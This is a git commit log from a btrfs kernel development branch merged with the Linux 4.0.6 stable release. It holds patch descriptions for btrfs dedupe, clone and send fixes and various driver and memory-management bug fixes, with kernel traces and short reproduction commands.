git.hungrycats.org Git

btrfs: don't update mtime on deduped inodes

One issue users have reported is that dedupe changes mtime on files,
resulting in tools like rsync thinking that their contents have changed when
in fact the data is exactly the same. Clone still wants an mtime change, so
we special case this in the code.

This was tested with the btrfs-extent-same tool.

Signed-off-by: Mark Fasheh <mfasheh@suse.de>

Revert "btrfs: add no_mtime flag to btrfs-extent-same"

This reverts commit e9b1e79bc5d2e84472feef75b98d3cd29a5c4937.

Btrfs: wake up extent state waiters on unlock through clear_extent_bits

When we clear an extent state's EXTENT_LOCKED bit with clear_extent_bits()
through free_io_failure(), we weren't waking up any tasks waiting for the
extent's state EXTENT_LOCKED bit, leading to an hang.

So make sure clear_extent_bits() ends up waking up any waiters if the
bit EXTENT_LOCKED is supplied by its callers.

Zygo Blaxell was experiencing such hangs at inode eviction time after
file unlinks. Thanks to him for a set of scripts to reproduce the issue.

Reported-by: Zygo Blaxell <ce3g8jdj@umail.furryterror.org>
Signed-off-by: Filipe Manana <fdmanana@suse.com>
Reviewed-by: Liu Bo <bo.li.liu@oracle.com>
Signed-off-by: Chris Mason <clm@fb.com>
(cherry picked from commit 0f31871f4411b5c0d42fb4403dec83a21a96100b)

btrfs: add no_mtime flag to btrfs-extent-same

One issue users have reported is that dedupe changes mtime on files,
resulting in tools like rsync thinking that their contents have changed when
in fact the data is exactly the same. Clone still wants an mtime change, so
we special case this in the code.

With this patch an application can pass the BTRFS_SAME_NO_MTIME flag to a
dedupe request and the kernel will honor it by only changing ctime.

I have an updated version of the btrfs-extent-same test program with a
switch to provide this flag at the 'no_time' branch of:

https://github.com/markfasheh/duperemove/

Signed-off-by: Mark Fasheh <mfasheh@suse.de>

btrfs: allow dedupe of same inode

clone() supports cloning within an inode so extent-same can do
the same now. This patch fixes up the locking in extent-same to
know about the single-inode case. In addition to that, we add a
check for overlapping ranges, which clone does not allow.

Signed-off-by: Mark Fasheh <mfasheh@suse.de>
Reviewed-by: David Sterba <dsterba@suse.cz>

btrfs: fix clone / extent-same deadlocks

Clone and extent same lock their source and target inodes in opposite order.
In addition to this, the range locking in clone doesn't take ordering into
account. Fix this by having clone use the same locking helpers as
btrfs-extent-same.

In addition, I do a small cleanup of the locking helpers, removing a case
(both inodes being the same) which was poorly accounted for and never
actually used by the callers.

Signed-off-by: Mark Fasheh <mfasheh@suse.de>
Reviewed-by: David Sterba <dsterba@suse.cz>

btrfs: fix deadlock with extent-same and readpage

->readpage() does page_lock() before extent_lock(), we do the opposite in
extent-same. We want to reverse the order in btrfs_extent_same() but it's
not quite straightforward since the page locks are taken inside btrfs_cmp_data().

So I split btrfs_cmp_data() into 3 parts with a small context structure that
is passed between them. The first, btrfs_cmp_data_prepare() gathers up the
pages needed (taking page lock as required) and puts them on our context
structure. At this point, we are safe to lock the extent range. Afterwards,
we use btrfs_cmp_data() to do the data compare as usual and btrfs_cmp_data_free()
to clean up our context.

Signed-off-by: Mark Fasheh <mfasheh@suse.de>
Reviewed-by: David Sterba <dsterba@suse.cz>

btrfs: pass unaligned length to btrfs_cmp_data()

In the case that we dedupe the tail of a file, we might expand the dedupe
len out to the end of our last block. We don't want to compare data past
i_size however, so pass the original length to btrfs_cmp_data().

Signed-off-by: Mark Fasheh <mfasheh@suse.de>
Reviewed-by: David Sterba <dsterba@suse.cz>

btrfs: Handle unaligned length in extent_same

The extent-same code rejects requests with an unaligned length. This
poses a problem when we want to dedupe the tail extent of files as we
skip cloning the portion between i_size and the extent boundary.

If we don't clone the entire extent, it won't be deleted. So the
combination of these behaviors winds up giving us worst-case dedupe on
many files.

We can fix this by allowing a length that extents to i_size and
internally aligining those to the end of the block. This is what
btrfs_ioctl_clone() so we can just copy that check over.

Signed-off-by: Mark Fasheh <mfasheh@suse.de>
Signed-off-by: Chris Mason <clm@fb.com>
(cherry picked from commit e1d227a42ea2b4664f94212bd1106b9a3413ffb8)

Revert "btrfs: Handle unaligned length in extent_same"

This reverts commit b4f7e43f9e25403eb81576f0cfdd110d27af85a8.

Revert "btrfs: pass unaligned length to btrfs_cmp_data()"

This reverts commit 24b0b90f2683951cbc30ef326cbd43f69b4e6416.

Revert "btrfs: fix deadlock with extent-same and readpage"

This reverts commit 405ef2a6134205a3d3cdda6a0751a70ea3fb40f4.

Merge tag 'v4.0.6' into zygo-4.0.6-zb64

This is the 4.0.6 stable release

# gpg: Signature made Mon Jun 22 20:03:58 2015 EDT using RSA key ID 6092693E
# gpg: Good signature from "Greg Kroah-Hartman (Linux kernel stable release signing key) <greg@kroah.com>"
# gpg: WARNING: This key is not certified with a trusted signature!
# gpg: There is no indication that the signature belongs to the owner.
# Primary key fingerprint: 647F 2865 4894 E3BD 4571 99BE 38DB BDC8 6092 693E

Linux 4.0.6

Btrfs: fix regression in raid level conversion

commit 153c35b6cccc0c72de9fae06c8e2c8b2c47d79d4 upstream.

Commit 2f0810880f082fa8ba66ab2c33b02e4ff9770a5e changed
btrfs_set_block_group_ro to avoid trying to allocate new chunks with the
new raid profile during conversion. This fixed failures when there was
no space on the drive to allocate a new chunk, but the metadata
reserves were sufficient to continue the conversion.

But this ended up causing a regression when the drive had plenty of
space to allocate new chunks, mostly because reduce_alloc_profile isn't
using the new raid profile.

Fixing btrfs_reduce_alloc_profile is a bigger patch. For now, do a
partial revert of 2f0810880, and don't error out if we hit ENOSPC.

Signed-off-by: Chris Mason <clm@fb.com>
Tested-by: Dave Sterba <dsterba@suse.cz>
Reported-by: Holger Hoffstaette <holger.hoffstaette@googlemail.com>
[adapted for stable kernel branch, v4.0.5]
Signed-off-by: David Sterba <dsterba@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

Btrfs: fix uninit variable in clone ioctl

commit de249e66a73d696666281cd812087979c6fae552 upstream.

Commit 0d97a64e0 creates a new variable but doesn't always set it up.
This puts it back to the original method (key.offset + 1) for the cases
not covered by Filipe's new logic.

Signed-off-by: Chris Mason <clm@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

Btrfs: fix range cloning when same inode used as source and destination

commit df858e76723ace61342b118aa4302bd09de4e386 upstream.

While searching for extents to clone we might find one where we only use
a part of it coming from its tail. If our destination inode is the same
the source inode, we end up removing the tail part of the extent item and
insert after a new one that point to the same extent with an adjusted
key file offset and data offset. After this we search for the next extent
item in the fs/subvol tree with a key that has an offset incremented by
one. But this second search leaves us at the new extent item we inserted
previously, and since that extent item has a non-zero data offset, it
it can make us call btrfs_drop_extents with an empty range (start == end)
which causes the following warning:

[23978.537119] WARNING: CPU: 6 PID: 16251 at fs/btrfs/file.c:550 btrfs_drop_extent_cache+0x43/0x385 [btrfs]()
(...)
[23978.557266] Call Trace:
[23978.557978]  [<ffffffff81425fd9>] dump_stack+0x4c/0x65
[23978.559191]  [<ffffffff81045390>] warn_slowpath_common+0xa1/0xbb
[23978.560699]  [<ffffffffa047f0ea>] ? btrfs_drop_extent_cache+0x43/0x385 [btrfs]
[23978.562389]  [<ffffffff8104544d>] warn_slowpath_null+0x1a/0x1c
[23978.563613]  [<ffffffffa047f0ea>] btrfs_drop_extent_cache+0x43/0x385 [btrfs]
[23978.565103]  [<ffffffff810e3a18>] ? time_hardirqs_off+0x15/0x28
[23978.566294]  [<ffffffff81079ff8>] ? trace_hardirqs_off+0xd/0xf
[23978.567438]  [<ffffffffa047f73d>] __btrfs_drop_extents+0x6b/0x9e1 [btrfs]
[23978.568702]  [<ffffffff8107c03f>] ? trace_hardirqs_on+0xd/0xf
[23978.569763]  [<ffffffff811441c0>] ? ____cache_alloc+0x69/0x2eb
[23978.570817]  [<ffffffff81142269>] ? virt_to_head_page+0x9/0x36
[23978.571872]  [<ffffffff81143c15>] ? cache_alloc_debugcheck_after.isra.42+0x16c/0x1cb
[23978.573466]  [<ffffffff811420d5>] ? kmemleak_alloc_recursive.constprop.52+0x16/0x18
[23978.574962]  [<ffffffffa0480d07>] btrfs_drop_extents+0x66/0x7f [btrfs]
[23978.576179]  [<ffffffffa049aa35>] btrfs_clone+0x516/0xaf5 [btrfs]
[23978.577311]  [<ffffffffa04983dc>] ? lock_extent_range+0x7b/0xcd [btrfs]
[23978.578520]  [<ffffffffa049b2a2>] btrfs_ioctl_clone+0x28e/0x39f [btrfs]
[23978.580282]  [<ffffffffa049d9ae>] btrfs_ioctl+0xb51/0x219a [btrfs]
(...)
[23978.591887] ---[ end trace 988ec2a653d03ed3 ]---

Then we attempt to insert a new extent item with a key that already
exists, which makes btrfs_insert_empty_item return -EEXIST resulting in
abortion of the current transaction:

[23978.594355] WARNING: CPU: 6 PID: 16251 at fs/btrfs/super.c:260 __btrfs_abort_transaction+0x52/0x114 [btrfs]()
(...)
[23978.622589] Call Trace:
[23978.623181]  [<ffffffff81425fd9>] dump_stack+0x4c/0x65
[23978.624359]  [<ffffffff81045390>] warn_slowpath_common+0xa1/0xbb
[23978.625573]  [<ffffffffa044ab6c>] ? __btrfs_abort_transaction+0x52/0x114 [btrfs]
[23978.626971]  [<ffffffff810453f0>] warn_slowpath_fmt+0x46/0x48
[23978.628003]  [<ffffffff8108a6c8>] ? vprintk_default+0x1d/0x1f
[23978.629138]  [<ffffffffa044ab6c>] __btrfs_abort_transaction+0x52/0x114 [btrfs]
[23978.630528]  [<ffffffffa049ad1b>] btrfs_clone+0x7fc/0xaf5 [btrfs]
[23978.631635]  [<ffffffffa04983dc>] ? lock_extent_range+0x7b/0xcd [btrfs]
[23978.632886]  [<ffffffffa049b2a2>] btrfs_ioctl_clone+0x28e/0x39f [btrfs]
[23978.634119]  [<ffffffffa049d9ae>] btrfs_ioctl+0xb51/0x219a [btrfs]
(...)
[23978.647714] ---[ end trace 988ec2a653d03ed4 ]---

This is wrong because we should not process the extent item that we just
inserted previously, and instead process the extent item that follows it
in the tree

For example for the test case I wrote for fstests:

   bs=$((64 * 1024))
   mkfs.btrfs -f -l $bs -O ^no-holes /dev/sdc
   mount /dev/sdc /mnt

   xfs_io -f -c "pwrite -S 0xaa $(($bs * 2)) $(($bs * 2))" /mnt/foo

   $CLONER_PROG -s $((3 * $bs)) -d $((267 * $bs)) -l 0 /mnt/foo /mnt/foo
   $CLONER_PROG -s $((217 * $bs)) -d $((95 * $bs)) -l 0 /mnt/foo /mnt/foo

The second clone call fails with -EEXIST, because when we process the
first extent item (offset 262144), we drop part of it (counting from the
end) and then insert a new extent item with a key greater then the key we
found. The next time we search the tree we search for a key with offset
262144 + 1, which leaves us at the new extent item we have just inserted
but we think it refers to an extent that we need to clone.

Fix this by ensuring the next search key uses an offset corresponding to
the offset of the key we found previously plus the data length of the
corresponding extent item. This ensures we skip new extent items that we
inserted and works for the case of implicit holes too (NO_HOLES feature).

A test case for fstests follows soon.

Signed-off-by: Filipe Manana <fdmanana@suse.com>
Signed-off-by: Chris Mason <clm@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

btrfs: cleanup orphans while looking up default subvolume

commit 727b9784b6085c99c2f836bf4fcc2848dc9cf904 upstream.

Orphans in the fs tree are cleaned up via open_ctree and subvolume
orphans are cleaned via btrfs_lookup_dentry -- except when a default
subvolume is in use. The name for the default subvolume uses a manual
lookup that doesn't trigger orphan cleanup and needs to trigger it
manually as well. This doesn't apply to the remount case since the
subvolumes are cleaned up by walking the root radix tree.

Signed-off-by: Jeff Mahoney <jeffm@suse.com>
Reviewed-by: David Sterba <dsterba@suse.cz>
Signed-off-by: Chris Mason <clm@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

btrfs: incorrect handling for fiemap_fill_next_extent return

commit 26e726afe01c1c82072cf23a5ed89ce25f39d9f2 upstream.

fiemap_fill_next_extent returns 0 on success, -errno on error, 1 if this was
the last extent that will fit in user array. If 1 is returned, the return
value may eventually returned to user space, which should not happen, according
to manpage of ioctl.

Signed-off-by: Chengyu Song <csong84@gatech.edu>
Reviewed-by: David Sterba <dsterba@suse.cz>
Reviewed-by: Liu Bo <bo.li.liu@oracle.com>
Signed-off-by: Chris Mason <clm@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

Btrfs: send, don't leave without decrementing clone root's send_progress

commit 2f1f465ae6da244099af55c066e5355abd8ff620 upstream.

If the clone root was not readonly or the dead flag was set on it, we were
leaving without decrementing the root's send_progress counter (and before
we just incremented it). If a concurrent snapshot deletion was in progress
and ended up being aborted, it would be impossible to later attempt to
delete again the snapshot, since the root's send_in_progress counter could
never go back to 0.

We were also setting clone_sources_to_rollback to i + 1 too early - if we
bailed out because the clone root we got is not readonly or flagged as dead
we ended up later derreferencing a null pointer because we didn't assign
the clone root to sctx->clone_roots[i].root:

for (i = 0; sctx && i < clone_sources_to_rollback; i++)
btrfs_root_dec_send_in_progress(
sctx->clone_roots[i].root);

So just don't increment the send_in_progress counter if the root is readonly
or flagged as dead.

Signed-off-by: Filipe Manana <fdmanana@suse.com>
Reviewed-by: David Sterba <dsterba@suse.cz>
Signed-off-by: Chris Mason <clm@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

Btrfs: send, add missing check for dead clone root

commit 5cc2b17e80cf5770f2e585c2d90fd8af1b901258 upstream.

After we locked the root's root item, a concurrent snapshot deletion
call might have set the dead flag on it. So check if the dead flag
is set and abort if it is, just like we do for the parent root.

Signed-off-by: Filipe Manana <fdmanana@suse.com>
Reviewed-by: David Sterba <dsterba@suse.cz>
Signed-off-by: Chris Mason <clm@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

x86/vdso: Fix 'make bzImage' on older distros

commit ef7254a595912b026d80a4116b8c4cd5b79d9c62 upstream.

Change HOST_EXTRACFLAGS to include arch/x86/include/uapi along
with include/uapi.

This looks more consistent, and this fixes "make bzImage" on my
old distro which doesn't have asm/bitsperlong.h in /usr/include/.

Signed-off-by: Oleg Nesterov <oleg@redhat.com>
Signed-off-by: Borislav Petkov <bp@suse.de>
Acked-by: Andy Lutomirski <luto@kernel.org>
Cc: <stable@vger.kernel.org>
Cc: Andy Lutomirski <luto@amacapital.net>
Cc: Borislav Petkov <bp@alien8.de>
Cc: Brian Gerst <brgerst@gmail.com>
Cc: Denys Vlasenko <dvlasenk@redhat.com>
Cc: H. Peter Anvin <hpa@zytor.com>
Cc: Jiri Olsa <jolsa@kernel.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Rusty Russell <rusty@rustcorp.com.au>
Cc: Thomas Gleixner <tglx@linutronix.de>
Fixes: 6f121e548f83 ("x86, vdso: Reimplement vdso.so preparation in build-time C")
Link: http://lkml.kernel.org/r/1431332153-18566-6-git-send-email-bp@alien8.de
Link: http://lkml.kernel.org/r/20150507165835.GB18652@redhat.com
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

x86/vdso: Fix the x86 vdso2c tool includes

commit 0a4f59d6e09ef16fbb7d213cfa1bf472c7845fda upstream.

The build-time tool arch/x86/vdso/vdso2c.c includes <linux/elf.h>,
but cannot find it, unless the build host happens to provide it.

It should be reading the uapi linux/elf.h

This build regression came along with the vdso2c changes between
v3.15 and v3.16.

Signed-off-by: Tommi Kyntola <tommi.kyntola@gmail.com>
Signed-off-by: Andy Lutomirski <luto@amacapital.net>
Link: http://lkml.kernel.org/r/1525002.3cJ7BySVpA@musta
Link: http://lkml.kernel.org/r/efe1ec29eda830b1d0030882706f3dac99ce1f73.1427482099.git.luto@kernel.org
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

irqchip: sunxi-nmi: Fix off-by-one error in irq iterator

commit febe06962ab191db50e633a0f79d9fb89a2d1078 upstream.

Fixes: 6058bb362818 'ARM: sun7i/sun6i: irqchip: Add irqchip driver for NMI controller'
Signed-off-by: Axel Lin <axel.lin@ingics.com>
Cc: Maxime Ripard <maxime.ripard@free-electrons.com>
Cc: Carlo Caione <carlo@caione.org>
Cc: Jason Cooper <jason@lakedaemon.net>
Link: http://lkml.kernel.org/r/1433684009.9134.1.camel@ingics.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

cfg80211: wext: clear sinfo struct before calling driver

commit 9c5a18a31b321f120efda412281bb9f610f84aa0 upstream.

Until recently, mac80211 overwrote all the statistics it could
provide when getting called, but it now relies on the struct
having been zeroed by the caller. This was always the case in
nl80211, but wext used a static struct which could even cause
values from one device leak to another.

Using a static struct is OK (as even documented in a comment)
since the whole usage of this function and its return value is
always locked under RTNL. Not clearing the struct for calling
the driver has always been wrong though, since drivers were
free to only fill values they could report, so calling this
for one device and then for another would always have leaked
values from one to the other.

Fix this by initializing the structure in question before the
driver method call.

This fixes https://bugzilla.kernel.org/show_bug.cgi?id=99691

Reported-by: Gerrit Renker <gerrit@erg.abdn.ac.uk>
Reported-by: Alexander Kaltsas <alexkaltsas@gmail.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

blk-mq: free hctx->ctxs in queue's release handler

commit c3b4afca7023b5aa0531912364246e67f79b3010 upstream.

Now blk_cleanup_queue() can be called before calling
del_gendisk()[1], inside which hctx->ctxs is touched
from blk_mq_unregister_hctx(), but the variable has
been freed by blk_cleanup_queue() at that time.

So this patch moves freeing of hctx->ctxs into queue's
release handler for fixing the oops reported by Stefan.

[1], 6cd18e711dd8075 (block: destroy bdi before blockdev is
unregistered)

Reported-by: Stefan Seyfried <stefan.seyfried@googlemail.com>
Cc: NeilBrown <neilb@suse.de>
Cc: Christoph Hellwig <hch@lst.de>
Signed-off-by: Ming Lei <tom.leiming@gmail.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

sched, numa: do not hint for NUMA balancing on VM_MIXEDMAP mappings

commit 8e76d4eecf7afeec9328e21cd5880e281838d0d6 upstream.

Jovi Zhangwei reported the following problem

  Below kernel vm bug can be triggered by tcpdump which mmaped a lot of pages
  with GFP_COMP flag.

  [Mon May 25 05:29:33 2015] page:ffffea0015414000 count:66 mapcount:1 mapping:          (null) index:0x0
  [Mon May 25 05:29:33 2015] flags: 0x20047580004000(head)
  [Mon May 25 05:29:33 2015] page dumped because: VM_BUG_ON_PAGE(compound_order(page) && !PageTransHuge(page))
  [Mon May 25 05:29:33 2015] ------------[ cut here ]------------
  [Mon May 25 05:29:33 2015] kernel BUG at mm/migrate.c:1661!
  [Mon May 25 05:29:33 2015] invalid opcode: 0000 [#1] SMP

In this case it was triggered by running tcpdump but it's not necessary
reproducible on all systems.

  sudo tcpdump -i bond0.100 'tcp port 4242' -c 100000000000 -w 4242.pcap

Compound pages cannot be migrated and it was not expected that such pages
be marked for NUMA balancing.  This did not take into account that drivers
such as net/packet/af_packet.c may insert compound pages into userspace
with vm_insert_page.  This patch tells the NUMA balancing protection
scanner to skip all VM_MIXEDMAP mappings which avoids the possibility that
compound pages are marked for migration.

Signed-off-by: Mel Gorman <mgorman@suse.de>
Reported-by: Jovi Zhangwei <jovi@cloudflare.com>
Cc: Ingo Molnar <mingo@elte.hu>
Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

md: don't return 0 from array_state_store

commit c008f1d356277a5b7561040596a073d87e56b0c8 upstream.

Returning zero from a 'store' function is bad.
The return value should be either len length of the string
or an error.

So use 'len' if 'err' is zero.

Fixes: 6791875e2e53 ("md: make reconfig_mutex optional for writes to md sysfs files.")
Signed-off-by: NeilBrown <neilb@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

md: Close race when setting 'action' to 'idle'.

commit 8e8e2518fceca407bb8fc2a6710d19d2e217892e upstream.

Checking ->sync_thread without holding the mddev_lock()
isn't really safe, even after flushing the workqueue which
ensures md_start_sync() has been run.

While this code is waiting for the lock, md_check_recovery could reap
the thread itself, and then start another thread (e.g. recovery might
finish, then reshape starts). When this thread gets the lock
md_start_sync() hasn't run so it doesn't get reaped, but
MD_RECOVERY_RUNNING gets cleared. This allows two threads to start
which leads to confusion.

So don't both if MD_RECOVERY_RUNNING isn't set, but if it is do
the flush and the test and the reap all under the mddev_lock to
avoid any race with md_check_recovery.

Signed-off-by: NeilBrown <neilb@suse.de>
Fixes: 6791875e2e53 ("md: make reconfig_mutex optional for writes to md sysfs files.")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

mm/memory_hotplug.c: set zone->wait_table to null after freeing it

commit 85bd839983778fcd0c1c043327b14a046e979b39 upstream.

Izumi found the following oops when hot re-adding a node:

    BUG: unable to handle kernel paging request at ffffc90008963690
    IP: __wake_up_bit+0x20/0x70
    Oops: 0000 [#1] SMP
    CPU: 68 PID: 1237 Comm: rs:main Q:Reg Not tainted 4.1.0-rc5 #80
    Hardware name: FUJITSU PRIMEQUEST2800E/SB, BIOS PRIMEQUEST 2000 Series BIOS Version 1.87 04/28/2015
    task: ffff880838df8000 ti: ffff880017b94000 task.ti: ffff880017b94000
    RIP: 0010:[<ffffffff810dff80>]  [<ffffffff810dff80>] __wake_up_bit+0x20/0x70
    RSP: 0018:ffff880017b97be8  EFLAGS: 00010246
    RAX: ffffc90008963690 RBX: 00000000003c0000 RCX: 000000000000a4c9
    RDX: 0000000000000000 RSI: ffffea101bffd500 RDI: ffffc90008963648
    RBP: ffff880017b97c08 R08: 0000000002000020 R09: 0000000000000000
    R10: 0000000000000000 R11: 0000000000000000 R12: ffff8a0797c73800
    R13: ffffea101bffd500 R14: 0000000000000001 R15: 00000000003c0000
    FS:  00007fcc7ffff700(0000) GS:ffff880874800000(0000) knlGS:0000000000000000
    CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    CR2: ffffc90008963690 CR3: 0000000836761000 CR4: 00000000001407e0
    Call Trace:
      unlock_page+0x6d/0x70
      generic_write_end+0x53/0xb0
      xfs_vm_write_end+0x29/0x80 [xfs]
      generic_perform_write+0x10a/0x1e0
      xfs_file_buffered_aio_write+0x14d/0x3e0 [xfs]
      xfs_file_write_iter+0x79/0x120 [xfs]
      __vfs_write+0xd4/0x110
      vfs_write+0xac/0x1c0
      SyS_write+0x58/0xd0
      system_call_fastpath+0x12/0x76
    Code: 5d c3 66 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 55 48 89 e5 48 83 ec 20 65 48 8b 04 25 28 00 00 00 48 89 45 f8 31 c0 48 8d 47 48 <48> 39 47 48 48 c7 45 e8 00 00 00 00 48 c7 45 f0 00 00 00 00 48
    RIP  [<ffffffff810dff80>] __wake_up_bit+0x20/0x70
     RSP <ffff880017b97be8>
    CR2: ffffc90008963690

Reproduce method (re-add a node)::
  Hot-add nodeA --> remove nodeA --> hot-add nodeA (panic)

This seems an use-after-free problem, and the root cause is
zone->wait_table was not set to *NULL* after free it in
try_offline_node.

When hot re-add a node, we will reuse the pgdat of it, so does the zone
struct, and when add pages to the target zone, it will init the zone
first (including the wait_table) if the zone is not initialized.  The
judgement of zone initialized is based on zone->wait_table:

static inline bool zone_is_initialized(struct zone *zone)
{
return !!zone->wait_table;
}

so if we do not set the zone->wait_table to *NULL* after free it, the
memory hotplug routine will skip the init of new zone when hot re-add
the node, and the wait_table still points to the freed memory, then we
will access the invalid address when trying to wake up the waiting
people after the i/o operation with the page is done, such as mentioned
above.

Signed-off-by: Gu Zheng <guz.fnst@cn.fujitsu.com>
Reported-by: Taku Izumi <izumi.taku@jp.fujitsu.com>
Reviewed by: Yasuaki Ishimatsu <isimatu.yasuaki@jp.fujitsu.com>
Cc: KAMEZAWA Hiroyuki <kamezawa.hiroyu@jp.fujitsu.com>
Cc: Tang Chen <tangchen@cn.fujitsu.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

arm64: dts: mt8173-evb: fix model name

commit 692ef3ee36833b6098a352c079d3cea8fc6ed3ef upstream.

Model name in mt8173-evb.dts doesn't follow dts convention (it should
be human readable model name). Fix it.

Fixes: b3a372484157 ("arm64: dts: Add mediatek MT8173 SoC and evaluation board dts and Makefile")
Signed-off-by: Yingjoe Chen <yingjoe.chen@mediatek.com>
Signed-off-by: Matthias Brugger <matthias.bgg@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

Revert "bus: mvebu-mbus: make sure SDRAM CS for DMA don't overlap the MBus bridge window"

commit 885dbd154b2f2ee305cec6fd0a162e1a77ae2b06 upstream.

This reverts commit 1737cac69369 ("bus: mvebu-mbus: make sure SDRAM CS
for DMA don't overlap the MBus bridge window"), because it breaks DMA
on platforms having more than 2 GB of RAM.

This commit changed the information reported to DMA masters device
drivers through the mv_mbus_dram_info() function so that the returned
DRAM ranges do not overlap with I/O windows.

This was necessary as a preparation to support the new CESA Crypto
Engine driver, which will use DMA for cryptographic operations. But
since it does DMA with the SRAM which is mapped as an I/O window,
having DRAM ranges overlapping with I/O windows was problematic.

To solve this, the above mentioned commit changed the mvebu-mbus to
adjust the DRAM ranges so that they don't overlap with the I/O
windows. However, by doing this, we re-adjust the DRAM ranges in a way
that makes them have a size that is no longer a power of two. While
this is perfectly fine for the Crypto Engine, which supports DRAM
ranges with a granularity of 64 KB, it breaks basically all other DMA
masters, which expect power of two sizes for the DRAM ranges.

Due to this, if the installed system memory is 4 GB, in two
chip-selects of 2 GB, the second DRAM range will be reduced from 2 GB
to a little bit less than 2 GB to not overlap with the I/O windows, in
a way that results in a DRAM range that doesn't have a power of two
size. This means that whenever you do a DMA transfer with an address
located in the [ 2 GB ; 4 GB ] area, it will freeze the system. Any
serious DMA activity like simply running:

for i in $(seq 1 64) ; do dd if=/dev/urandom of=file$i bs=1M count=16 ; done

in an ext3 partition mounted over a SATA drive will freeze the system.

Since the new CESA crypto driver that uses DMA has not been merged
yet, the easiest fix is to simply revert this commit. A follow-up
commit will introduce a different solution for the CESA crypto driver.

Signed-off-by: Thomas Petazzoni <thomas.petazzoni@free-electrons.com>
Fixes: 1737cac69369 ("bus: mvebu-mbus: make sure SDRAM CS for DMA don't overlap the MBus bridge window")
Signed-off-by: Gregory CLEMENT <gregory.clement@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

bus: mvebu-mbus: do not set WIN_CTRL_SYNCBARRIER on non io-coherent platforms.

commit 8c9e06e64768665503e778088a39ecff3a6f2e0c upstream.

Commit a0b5cd4ac2d6 ("bus: mvebu-mbus: use automatic I/O
synchronization barriers") enabled the usage of automatic I/O
synchronization barriers by enabling bit WIN_CTRL_SYNCBARRIER in the
control registers of MBus windows, but on non io-coherent platforms
(orion5x, kirkwood and dove) the WIN_CTRL_SYNCBARRIER bit in
the window control register is either reserved (all windows except 6
and 7) or enables read-only protection (windows 6 and 7).

Signed-off-by: Nicolas Schichan <nschichan@freebox.fr>
Reviewed-by: Thomas Petazzoni <thomas.petazzoni@free-electrons.com>
Fixes: a0b5cd4ac2d6 ("bus: mvebu-mbus: use automatic I/O synchronization barriers")
Signed-off-by: Thomas Petazzoni <thomas.petazzoni@free-electrons.com>
Signed-off-by: Gregory CLEMENT <gregory.clement@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

ata: ahci_mvebu: Fix wrongly set base address for the MBus window setting

commit e96998fc200867f005dd14c7d1dd35e1107d4914 upstream.

According to the Armada 38x datasheet, the window base address
registers value is set in bits [31:4] of the register and corresponds
to the transaction address bits [47:20].

Therefore, the 32bit base address value should be shifted right by
20bits and left by 4bits, resulting in 16 bit shift right.

The bug as not been noticed yet because if the memory available on
the platform is less than 2GB, then the base address is zero.

[gregory.clement@free-electrons.com: add extra-explanation]

Fixes: a3464ed2f14 (ata: ahci_mvebu: new driver for Marvell Armada 380
AHCI interfaces)
Signed-off-by: Nadav Haklai <nadavh@marvell.com>
Reviewed-by: Omri Itach <omrii@marvell.com>
Signed-off-by: Gregory CLEMENT <gregory.clement@free-electrons.com>
Signed-off-by: Tejun Heo <tj@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

virtio_pci: Clear stale cpumask when setting irq affinity

commit 210d150e1f5da506875e376422ba31ead2d49621 upstream.

The cpumask vp_dev->msix_affinity_masks[info->msix_vector] may contain
staled information when vp_set_vq_affinity() gets called, so clear it
before setting the new cpu bit mask.

Signed-off-by: Jiang Liu <jiang.liu@linux.intel.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

of/dynamic: Fix test for PPC_PSERIES

commit f76502aa9140ec338a59487218bf70a9c9e92b8f upstream.

"IS_ENABLED(PPC_PSERIES)" always evaluates to false, as IS_ENABLED() is
supposed to be used with the full Kconfig symbol name, including the
"CONFIG_" prefix.

Add the missing "CONFIG_" prefix to fix this.

Fixes: a25095d451ece23b ("of: Move dynamic node fixups out of powerpc and into common code")
Signed-off-by: Geert Uytterhoeven <geert+renesas@glider.be>
Signed-off-by: Grant Likely <grant.likely@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

serial: imx: Fix DMA handling for IDLE condition aborts

commit 392bceedb107a3dc1d4287e63d7670d08f702feb upstream.

The driver configures the IDLE condition to interrupt the SDMA engine.
